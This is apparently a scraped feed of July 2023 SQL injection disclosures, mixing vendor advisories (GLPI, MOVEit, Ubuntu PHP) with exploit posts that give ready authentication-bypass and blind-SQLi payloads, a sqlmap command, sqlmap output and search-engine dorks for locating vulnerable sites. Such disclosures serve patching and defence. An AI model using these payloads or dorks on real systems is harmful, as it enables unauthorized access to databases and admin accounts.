GLPI is a free asset and IT management software package. Starting in version 10.0.0 and prior to version 10.0.8, GLPI inventory endpoint can be used to drive a SQL injection attack. By default, GLPI inventory endpoint requires no authentication. Version 10.0.8 has a patch for this issue. As a workaround, one may disable native inventory.

High

trasher published GHSA-gxh4-j63w-8jmm

Jul 5, 2023

**Package**

glpi (glpi)

**Affected versions**

\>= 10.0.0

**Patched versions**

10.0.8

**Description**

**Impact**

GLPI inventory endpoint can be used to drive a SQL injection attack.

**Patches**

Upgrade to 10.0.8

**Workarounds**

Disable native inventory.

**For more information**

If you have any questions or comments about this advisory, mail us at glpi-security@ow2.org.

**Severity**

High

8.6

/ 10

**CVSS base metrics**

Attack vector

Network

Attack complexity

Low

Privileges required

None

User interaction

None

Scope

Changed

Confidentiality

High

Integrity

None

Availability

None

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

**CVE ID**

CVE-2023-35924

**Weaknesses**

CWE-89

CVE-2023-35924: SQL injection via inventory agent request

In Progress MOVEit Transfer before 2020.1.11 (12.1.11), 2021.0.9 (13.0.9), 2021.1.7 (13.1.7), 2022.0.7 (14.0.7), 2022.1.8 (14.1.8), and 2023.0.4 (15.0.4), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content.

Loading

×Sorry to interrupt

CSS Error

Refresh

CVE-2023-36934: Progress Customer Community

Beauty Salon Management System version 1.0 suffers from a remote SQL injection vulnerability.

# Exploit Title: Beauty Salon Management System v1.0 - SQLi  
# Date of found: 04/07/2023  
# Exploit Author: Fatih Nacar  
# Version: V1.0  
# Tested on: Windows 10  
# Vendor Homepage: https://www.campcodes.com <https://www.campcodes.com/projects/retro-cellphone-online-store-an-e-commerce-project-in-php-mysqli/>  
# Software Link: https://www.campcodes.com/projects/beauty-salon-management-system-in-php-and-mysqli/  
# CWE: CWE-89

Vulnerability Description -

Beauty Salon Management System: V1.0, developed by Campcodes, has been  
found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability  
allows an attacker to manipulate login authentication with the SQL queries  
and bypass authentication. The system fails to properly validate  
user-supplied input in the username and password fields during the login  
process, enabling an attacker to inject malicious SQL code. By exploiting  
this vulnerability, an attacker can bypass authentication and gain  
unauthorized access to the system.

Steps to Reproduce -

The following steps outline the exploitation of the SQL Injection  
vulnerability in Beauty Salon Management System V1.0:

1. Open the admin login page by accessing the URL:  
http://localhost/Chic%20Beauty%20Salon%20System/admin/index.php

2. In the username and password fields, insert the following SQL Injection  
payload shown inside brackets to bypass authentication for usename  
parameter:

{Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374  
ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign  
In}

3.Execute the SQL Injection payload.

As a result of successful exploitation, the attacker gains unauthorized  
access to the system and is logged in with administrative privileges.

Sqlmap results:

POST parameter 'username' is vulnerable. Do you want to keep testing the  
others (if any)? [y/N] y

sqlmap identified the following injection point(s) with a total of 793  
HTTP(s) requests:

---

Parameter: username (POST)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)

Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374  
ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign  
In

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: username=admin' AND (SELECT 1468 FROM (SELECT(SLEEP(5)))qZVk)--  
rvYF&password=test&login=Sign In

---

[15:58:56] [INFO] the back-end DBMS is MySQL

web application technology: PHP 8.2.4, Apache 2.4.56

back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

Beauty Salon Management System 1.0 SQL Injection

Super Store Finder PHP Script versions 3.6 and below suffer from a remote SQL injection vulnerability that allows for authentication bypass.

    #Title : Super Store Finder PHP Script SQL Injection / Bypass admin login#Researcher : Etharus#Vendor : Joe Iz, https://superstorefinder.net/#Script Demo Url : https://superstorefinder.net/products/superstorefinder/#Version Affected : 3.6 and below#Date : 5 July 2023#FOFA Dork : "designed and built by Joe Iz."# Step 1 : Go to admin login, eg: http://localhost/store-finder/admin/# Step 2 : Enter following payloadusername : ' union select 1,'admin','32ddaaea6874e2d3eab0a9ea6ecbb0d0',4,5,6,7,8,9,10,11-- -password : admin

Super Store Finder PHP Script 3.6 SQL Injection

Ubuntu Security Notice 6199-1 - It was discovered that PHP incorrectly handled certain Digest authentication for SOAP. An attacker could possibly use this issue to expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6199-1  
July 03, 2023

php7.4, php8.1 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

PHP could be made to expose sensitive information.

Software Description:  
- php8.1: HTML-embedded scripting language interpreter  
- php7.4: HTML-embedded scripting language interpreter

Details:

It was discovered that PHP incorrectly handled certain Digest  
authentication for SOAP. An attacker could possibly use this issue  
to expose sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  libapache2-mod-php7.4           8.1.12-1ubuntu4.2  
  libapache2-mod-php8.0           8.1.12-1ubuntu4.2  
  libapache2-mod-php8.1           8.1.12-1ubuntu4.2  
  php8.1                          8.1.12-1ubuntu4.2  
  php8.1-cgi                      8.1.12-1ubuntu4.2  
  php8.1-cli                      8.1.12-1ubuntu4.2  
  php8.1-soap                     8.1.12-1ubuntu4.2

Ubuntu 22.10:  
  libapache2-mod-php7.4           8.1.7-1ubuntu3.5  
  libapache2-mod-php8.0           8.1.7-1ubuntu3.5  
  libapache2-mod-php8.1           8.1.7-1ubuntu3.5  
  php8.1                          8.1.7-1ubuntu3.5  
  php8.1-cgi                      8.1.7-1ubuntu3.5  
  php8.1-cli                      8.1.7-1ubuntu3.5  
  php8.1-soap                     8.1.7-1ubuntu3.5

Ubuntu 22.04 LTS:  
  libapache2-mod-php7.4           8.1.2-1ubuntu2.13  
  libapache2-mod-php8.0           8.1.2-1ubuntu2.13  
  libapache2-mod-php8.1           8.1.2-1ubuntu2.13  
  php8.1                          8.1.2-1ubuntu2.13  
  php8.1-cgi                      8.1.2-1ubuntu2.13  
  php8.1-cli                      8.1.2-1ubuntu2.13  
  php8.1-soap                     8.1.2-1ubuntu2.13  
  php8.1-sqlite3                  8.1.2-1ubuntu2.13

Ubuntu 20.04 LTS:  
  libapache2-mod-php7.4           7.4.3-4ubuntu2.19  
  php7.4                          7.4.3-4ubuntu2.19  
  php7.4-cgi                      7.4.3-4ubuntu2.19  
  php7.4-cli                      7.4.3-4ubuntu2.19  
  php7.4-soap                     7.4.3-4ubuntu2.19

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6199-1  
  CVE-2023-3247

Package Information:  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.12-1ubuntu4.2  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.7-1ubuntu3.5  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.2-1ubuntu2.13  
  https://launchpad.net/ubuntu/+source/php7.4/7.4.3-4ubuntu2.19

Ubuntu Security Notice USN-6199-1

A vulnerability, which was classified as critical, was found in SourceCodester Shopping Website 1.0. Affected is an unknown function of the file search-result.php. The manipulation of the argument product leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-232950 is the identifier assigned to this vulnerability.

CVE-2023-3502

WordPress WP AutoComplete Search plugin versions 1.0.4 and below suffer from a remote SQL injection vulnerability.

    # Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi# Date: 30/06/2023# Exploit Author: Matin nouriyan (matitanium)# Version: <= 1.0.4# CVE: CVE-2022-4297Vendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/# Tested on: Kali linux---------------------------------------The WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX available to unauthenticated users,leading to an unauthenticated SQL injection--------------------------------------How to Reproduce this Vulnerability:1. Install WP AutoComplete <= 1.0.4 2. WP AutoComplete <= 1.0.4 using q parameter for ajax requests3. Find requests belong to WP AutoComplete like step 54. Start sqlmap and exploit 5. python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000&timestamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p q

WordPress WP AutoComplete Search 1.0.4 SQL Injection

The Tutor LMS WordPress plugin before 2.2.1 does not implement adequate permission checks for REST API endpoints, allowing unauthenticated attackers to access information from Lessons that should not be publicly available.

CVE-2023-3133: Tutor LMS – eLearning and online course solution

AppleZeed CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

**AppleZeed CMS 2.0 SQL Injection**

Posted Jul 4, 2023

Authored by indoushka

AppleZeed CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

tags | exploit, remote, sql injection

SHA-256 | b10dc7fe6d4f1a88b74eac3ee061dec5b828171e6513804abc4b45080828e37b

Download | Favorite | View

**AppleZeed CMS 2.0 SQL Injection**

    ====================================================================================================================================| # Title     : AppleZeed CMS v2.0 Auth by pass Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 71.0(32-bit)                                               | | # Vendor    : https://applezeed.com                                                                                              |  | # Dork      : intext:"Power BY applezeed.com "php?id="                                                                           |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user & pass = 1' or 1=1 -- -[+] admin path = /backend/[+] http://TARGET/backend/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,564)
*   Arbitrary (16,123)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,205)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,331)
*   DoS (23,296)
*   Encryption (2,364)
*   Exploit (51,438)
*   File Inclusion (4,203)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,743)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,414)
*   Magazine (586)
*   Overflow (12,629)
*   Perl (1,423)
*   PHP (5,136)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,592)
*   Root (3,574)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,862)
*   Shell (3,170)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,261)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,656)
*   Web (9,602)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,795)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,783)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,075)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,716)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

AppleZeed CMS 2.0 SQL Injection

ApnaTrademark CMS version 2.5 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : ApnaTrademark CMS V2.5 Auth by pass Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : http://apnatrademark.com/aboutus.php                                                                               |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload in user & pass : 1'or'1'='1[+] http://127.0.0.1/apnatrademarkcom/admin/====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

Tag

#sql